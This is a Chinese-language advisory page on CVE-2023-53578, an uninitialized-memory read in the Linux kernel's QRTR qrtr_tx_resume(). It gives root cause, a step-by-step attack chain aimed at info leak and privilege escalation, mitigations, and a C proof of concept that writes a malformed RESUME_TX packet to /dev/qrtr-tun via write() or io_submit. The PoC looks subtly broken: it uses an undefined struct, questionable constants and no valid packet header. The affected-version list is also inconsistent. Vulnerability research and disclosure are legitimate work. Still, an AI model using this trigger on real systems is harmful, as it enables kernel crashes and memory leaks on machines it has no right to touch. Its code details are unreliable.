CVE-2023-53578 Linux内核QRTR子系统未初始化变量访问漏洞

漏洞信息

漏洞编号

CVE-2023-53578

漏洞类型

未初始化变量访问漏洞

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel (net/qrtr子系统)

漏洞概述

CVE-2023-53578是Linux内核QRTR（Qualcomm IPC Router）子系统中的一个高危漏洞，涉及qrtr_tx_resume()函数中的未初始化变量访问问题。该漏洞由syzbot模糊测试工具发现，CVSS评分为7.8，属于高危级别。

QRTR是Linux内核中用于Qualcomm芯片平台上处理器间通信（IPC）的协议子系统，广泛应用于移动设备和嵌入式系统中。该漏洞存在于net/qrtr/af_qrtr.c文件的qrtr_tx_resume()函数中，当处理QRTR_TYPE_RESUME_TX类型的控制包时，由于未对传入的sk_buff（socket buffer）长度进行充分校验，可能导致访问未初始化的内存区域。

具体而言，qrtr_tx_resume()函数期望skb->len至少为sizeof(struct qrtr_ctrl_pkt)的大小，但在qrtr_endpoint_post()函数中，当qrtr_cb->type等于QRTR_TYPE_RESUME_TX时，传入的size参数可能小于struct qrtr_ctrl_pkt的大小。这种情况下，函数会读取超出实际初始化范围的内存数据，从而触发KMSAN（Kernel Memory Sanitizer）检测到的未初始化值使用错误。

该漏洞可被本地低权限用户利用，通过精心构造的io_submit系统调用和qrtr隧道写入操作触发，可能导致内核信息泄露、权限提升或系统崩溃。由于攻击需要本地访问权限且需要低权限认证，影响范围相对有限，但仍对使用Qualcomm芯片平台的Linux系统构成严重威胁。

技术细节

该漏洞的技术原理涉及Linux内核QRTR协议栈中的内存管理缺陷。

漏洞根因分析：
在net/qrtr/af_qrtr.c的qrtr_endpoint_post()函数中，当接收到QRTR_TYPE_RESUME_TX类型的控制包时，函数通过kmalloc分配sk_buff缓冲区，但分配的大小(size)可能小于struct qrtr_ctrl_pkt结构体的大小。随后，该sk_buff被传递给qrtr_tx_resume()函数，该函数在第230行访问skb->len对应的数据时，期望至少有sizeof(struct qrtr_ctrl_pkt)字节的有效数据，但由于实际分配的缓冲区较小，导致读取了未初始化的内存区域。

触发路径：
1. 用户空间通过io_submit系统调用提交异步I/O操作
2. 调用aio_write写入qrtr隧道设备(/dev/qrtr-tun)
3. qrtr_tun_write_iter()处理写入请求
4. qrtr_endpoint_post()分配sk_buff并设置qrtr_cb->type为QRTR_TYPE_RESUME_TX
5. qrtr_tx_resume()尝试访问超出初始化范围的内存

利用方式：
攻击者可通过以下步骤利用此漏洞：
1. 打开qrtr隧道设备获取文件描述符
2. 构造特殊的QRTR_TYPE_RESUME_TX控制包，确保其大小小于struct qrtr_ctrl_pkt
3. 通过aio_write异步写入提交该数据包
4. 内核在处理过程中读取未初始化内存，可能泄露内核栈/堆数据
5. 利用泄露的信息进行进一步的内核利用，如权限提升

修复方案：
在qrtr_endpoint_post()函数中添加对QRTR_TYPE_RESUME_TX类型的size检查，确保传入的缓冲区大小至少为sizeof(struct qrtr_ctrl_pkt)，从而避免访问未初始化的内存区域。

攻击链分析

STEP 1

步骤1：获取QRTR隧道设备访问权限

攻击者需要本地访问系统，并具有打开qrtr隧道设备(/dev/qrtr-tun)的权限。该设备通常在Qualcomm芯片平台的Linux系统中可用。

STEP 2

步骤2：构造畸形控制包

攻击者构造一个QRTR_TYPE_RESUME_TX类型的控制包，但数据包大小故意设置为小于sizeof(struct qrtr_ctrl_pkt)的值，以触发未初始化内存访问。

STEP 3

步骤3：通过异步I/O提交数据包

使用io_submit系统调用通过异步I/O方式将畸形数据包写入qrtr隧道设备，调用路径为io_submit -> aio_write -> qrtr_tun_write_iter -> qrtr_endpoint_post。

STEP 4

步骤4：触发未初始化变量访问

qrtr_endpoint_post()分配sk_buff缓冲区并传递给qrtr_tx_resume()，由于缓冲区大小不足，qrtr_tx_resume()在访问skb数据时读取了未初始化的内存区域。

STEP 5

步骤5：利用泄露的内存信息

攻击者可通过KMSAN报告或其他侧信道获取泄露的内核内存内容，可能包含敏感的内核数据结构信息，为后续权限提升攻击提供基础。

STEP 6

步骤6：权限提升或系统破坏

利用泄露的内核信息，攻击者可能进行进一步的内核利用，实现权限提升或导致系统崩溃/拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-53578 PoC - Linux Kernel QRTR Uninit Variable Access
// This PoC triggers the uninitialized variable access bug in qrtr_tx_resume()
// by sending a QRTR_TYPE_RESUME_TX control packet with insufficient size.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>

#define QRTR_TUN_DEV "/dev/qrtr-tun"
#define QRTR_TYPE_RESUME_TX 2  // QRTR_TYPE_RESUME_TX type value
#define QRTR_CTRL_PKT_SIZE 8   // sizeof(struct qrtr_ctrl_pkt)

// Trigger the vulnerability via qrtr tunnel write
int trigger_vuln(void) {
    int fd;
    char buf[4];  // Intentionally smaller than sizeof(struct qrtr_ctrl_pkt)
    struct qrtr_ctrl_pkt pkt;

    fd = open(QRTR_TUN_DEV, O_WRONLY);
    if (fd < 0) {
        perror("open qrtr-tun");
        return -1;
    }

    // Construct a malformed QRTR_TYPE_RESUME_TX packet
    // Size is less than sizeof(struct qrtr_ctrl_pkt) to trigger the bug
    memset(buf, 0, sizeof(buf));
    buf[0] = QRTR_TYPE_RESUME_TX;  // Set type to trigger vulnerable path

    // Write the malformed packet - this triggers qrtr_endpoint_post()
    // with insufficient size, leading to uninit memory access in qrtr_tx_resume()
    write(fd, buf, sizeof(buf));

    close(fd);
    return 0;
}

// Alternative: Use io_submit (as shown in the call trace) for async trigger
int trigger_vuln_async(void) {
    int fd, ret;
    struct iocb cb;
    struct iocb *cbs[1];
    char buf[4];  // Smaller than qrtr_ctrl_pkt
    long ioctx_id;
    aio_context_t ioctx = 0;

    // Setup AIO context
    ret = syscall(SYS_io_setup, 1, &ioctx);
    if (ret < 0) {
        perror("io_setup");
        return -1;
    }

    fd = open(QRTR_TUN_DEV, O_WRONLY);
    if (fd < 0) {
        perror("open qrtr-tun");
        return -1;
    }

    memset(buf, 0, sizeof(buf));
    buf[0] = QRTR_TYPE_RESUME_TX;

    // Prepare async I/O control block
    memset(&cb, 0, sizeof(cb));
    cb.aio_fildes = fd;
    cb.aio_buf = (unsigned long)buf;
    cb.aio_nbytes = sizeof(buf);  // Intentionally too small
    cb.aio_offset = 0;
    cb.aio_lio_opcode = IOCB_CMD_PWRITE;
    cbs[0] = &cb;

    // Submit async write - triggers the vulnerable code path
    // Call trace: io_submit -> aio_write -> qrtr_tun_write_iter -> 
    //             qrtr_endpoint_post -> qrtr_tx_resume (BUG)
    ret = syscall(SYS_io_submit, ioctx, 1, cbs);
    if (ret < 0) {
        perror("io_submit");
    }

    close(fd);
    syscall(SYS_io_destroy, ioctx);
    return 0;
}

int main(int argc, char *argv[]) {
    printf("CVE-2023-53578 PoC - Linux Kernel QRTR Uninit Variable Access\n");
    printf("Triggering vulnerability...\n");

    if (argc > 1 && strcmp(argv[1], "async") == 0) {
        trigger_vuln_async();
    } else {
        trigger_vuln();
    }

    printf("Done. Check kernel logs for KMSAN report or crash.\n");
    return 0;
}

影响范围

Linux Kernel < 6.6 (受commit bef57c227b52修复的版本)

Linux Kernel < 6.1 (受commit c6a796ee5a639修复的版本)

Linux Kernel < 5.15 (受commit 8c9ce34a6ff2修复的版本)

Linux Kernel < 5.10 (受commit 6417070918de修复的版本)

Linux Kernel < 5.4 (受commit 3814d211ff13修复的版本)

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）通过文件权限或SELinux/AppArmor策略限制对/dev/qrtr-tun设备的访问，仅允许可信用户访问；2）如果系统不使用QRTR功能，可以通过禁用相关内核模块（qrtr、qrtr-tun）来避免漏洞被触发；3）启用内核内存保护机制如KASLR、SMEP/SMAP等增加利用难度；4）密切监控系统日志，关注KMSAN或KASAN报告中的异常访问；5）限制本地低权限用户的系统调用能力，特别是io_submit等可能被用于触发漏洞的系统调用。